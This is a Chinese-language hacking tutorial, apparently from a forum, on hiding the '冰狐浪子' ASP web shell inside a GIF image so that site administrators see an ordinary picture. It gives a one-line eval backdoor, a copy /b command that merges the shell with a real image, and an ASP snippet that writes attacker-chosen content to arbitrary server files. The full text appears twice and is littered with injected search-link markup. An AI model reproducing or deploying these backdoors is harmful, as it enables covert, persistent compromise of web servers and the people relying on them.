一个网站里面除了asp文件,再就数图片文件最多了,它让我们的网页"漂亮动人"嘻嘻,但是你有没有想到过这里面暗藏的杀机,图片也可以是asp<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>。
?asp<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>已经出现很长时间了,种类也越来越多,但是说到隐蔽性,我们红魂老大写的--冰狐浪子asp后门还是我众马中的首选,现在我们就把它作成图片asp<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>。
首先我们把冰狐浪子asp<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>服务端直接该后缀名为gif,记得用容错格式:
<SCRIPT RUNAT=SERVER LANGUAGE=javascript>try{eval(Request.form('#') '')}catch(e){}</SCRIPT>
一、include给我们指路
接下来要使用include指令,这个指令也是我们经常看到的,但是它有一个很非凡的功能,可能你就没有用到过了。这就是可以调用位于其它文件中的函数,不管它的后缀名是什么,哪怕是个图片文件。
然后我们新建一个asp文件,在里面写入
不过这里还有一个小问题,虽然网站里图片很多,但假如治理员不小心打开这个图片,在IE上显示的是一把小红叉,他会怎么想呢?
为了不让人怀疑,要让我们的图片美人动起来,让它成为真正的gif文件!
二、copy给我们加油
把asp.gif改名为asp.asp,然后去找个图片来,至于什么内容的图片,就看你自己的爱好啦,不过最好不要超过20kb,大了执行的速度就慢,把它保存为1.gif。
再启动windows下的dos窗口,键入copy 1.gif /b asp.asp /a asp.gif
其中参数/b 是指定以二进制格式复制、合并文件。参数/a 是指定以ascll格式复制、合并文件。这里要注重文件的顺序。执行完后就会生成asp.gif,这就是我们的冰狐浪子asp<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>服务端。不过现在它已经伪装成一个婷婷玉立的美人了,嘿嘿!假如要插入其他asp文件中,请插入下面代码
<%
on error resume next
id=request("id")
if request("id")=1 then
testfile=Request.form("name")
msg=Request.form("message")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg& "")
thisfile.close
set fs = nothing
%>
<form method="POST" ACTION="你插入文件的文件名?id=1">
<% end if %>
这里我们用一个id参数来蔽掉了,图片所产生的乱码。
?asp<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>已经出现很长时间了,种类也越来越多,但是说到隐蔽性,我们红魂老大写的--冰狐浪子asp后门还是我众马中的首选,现在我们就把它作成图片asp<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>。
首先我们把冰狐浪子asp<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>服务端直接该后缀名为gif,记得用容错格式:
<SCRIPT RUNAT=SERVER LANGUAGE=javascript>try{eval(Request.form('#') '')}catch(e){}</SCRIPT>
一、include给我们指路
接下来要使用include指令,这个指令也是我们经常看到的,但是它有一个很非凡的功能,可能你就没有用到过了。这就是可以调用位于其它文件中的函数,不管它的后缀名是什么,哪怕是个图片文件。
然后我们新建一个asp文件,在里面写入
不过这里还有一个小问题,虽然网站里图片很多,但假如治理员不小心打开这个图片,在IE上显示的是一把小红叉,他会怎么想呢?
为了不让人怀疑,要让我们的图片美人动起来,让它成为真正的gif文件!
二、copy给我们加油
把asp.gif改名为asp.asp,然后去找个图片来,至于什么内容的图片,就看你自己的爱好啦,不过最好不要超过20kb,大了执行的速度就慢,把它保存为1.gif。
再启动windows下的dos窗口,键入copy 1.gif /b asp.asp /a asp.gif
其中参数/b 是指定以二进制格式复制、合并文件。参数/a 是指定以ascll格式复制、合并文件。这里要注重文件的顺序。执行完后就会生成asp.gif,这就是我们的冰狐浪子asp<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=木马 target="_blank"><font color=red>木马</font></a></b>服务端。不过现在它已经伪装成一个婷婷玉立的美人了,嘿嘿!假如要插入其他asp文件中,请插入下面代码
<%
on error resume next
id=request("id")
if request("id")=1 then
testfile=Request.form("name")
msg=Request.form("message")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg& "")
thisfile.close
set fs = nothing
%>
<form method="POST" ACTION="你插入文件的文件名?id=1">
<% end if %>
这里我们用一个id参数来蔽掉了,图片所产生的乱码。